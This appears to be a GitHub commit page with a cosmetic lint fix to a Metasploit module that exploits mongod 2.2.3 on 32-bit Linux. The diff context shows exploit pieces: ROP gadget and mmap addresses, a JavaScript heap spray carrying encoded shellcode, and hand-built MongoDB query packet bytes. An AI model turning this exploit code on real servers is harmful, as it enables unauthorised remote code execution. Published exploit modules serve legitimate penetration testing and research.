Skip to content

Commit 4a683ec

Browse files
author
agix
committed
Fix msftidy WARNING
1 parent 69fb465 commit 4a683ec

File tree

1 file changed

+7
-8
lines changed

1 file changed

+7
-8
lines changed

modules/exploits/linux/misc/mongod_native_helper.rb

Lines changed: 7 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@ def initialize(info={})
1919
},
2020
'Author' =>
2121
[
22-
'agix @agixid'
22+
'agix - @agixid'
2323
],
2424
'References' =>
2525
[
@@ -29,12 +29,12 @@ def initialize(info={})
2929
'Platform' => ['linux'],
3030
'Targets' =>
3131
[
32-
[ 'Linux - mongod 2.2.3 - 32bits',
32+
[ 'Linux - mongod 2.2.3 - 32bits',
3333
{
3434
'Arch' => ARCH_X86,
3535
'mmap' => [
3636
0x0816f768, #mmap_64@plt
37-
0x0c0c0c0c, #NOPSLED+SHELLCODE
37+
0x0c0c0c0c, #NOPSLED+SHELLCODE
3838
0x0c0c0000,
3939
0x00001000,
4040
0x00000007,
@@ -52,6 +52,7 @@ def initialize(info={})
5252
} ]
5353
],
5454
'DefaultTarget' => 0,
55+
'DisclosureDate' => 'Mar 24 2013',
5556
'License' => MSF_LICENSE
5657
))
5758

@@ -95,7 +96,6 @@ def exploit
9596
end
9697
end
9798
print_status("Let's exploit, heap spray could take some time...")
98-
9999
my_target = target
100100

101101
shellcode = Rex::Text.to_unescape(payload.encoded)
@@ -106,7 +106,6 @@ def exploit
106106

107107
gadget1 = my_target['gadget1']
108108

109-
110109
gadget2 = my_target['gadget2']
111110
gadget3 = my_target['gadget3']
112111
gadget4 = my_target['gadget4']
@@ -130,7 +129,7 @@ def exploit
130129
payloadJS << chunk_var+'='+chunk_var+'.substring(0,('+sizechunk_var+'-'+shellcode_var+'.length));'
131130
payloadJS << array_var+'=new Array();'
132131
payloadJS << 'for('+i_var+'=0;'+i_var+'<25000;'+i_var+'++){ '+array_var+'['+i_var+']='+chunk_var+'+'+shellcode_var+'; } '
133-
132+
134133
#RETCHAIN+ROPCHAIN HEAPSPRAY
135134
payloadJS << ropchain_var+'=unescape("'+Rex::Text.to_unescape(mmap)+'");'
136135
payloadJS << chunk2_var+'="";'
@@ -145,7 +144,7 @@ def exploit
145144

146145

147146
request_id = Rex::Text.rand_text(4)
148-
147+
149148
packet = request_id #requestID
150149
packet << "\xff\xff\xff\xff" #responseTo
151150
packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY)
@@ -274,7 +273,7 @@ def auth(nonce)
274273
return 1
275274
end
276275

277-
276+
278277
end
279278

280279
def get_nonce

0 commit comments

Comments
 (0)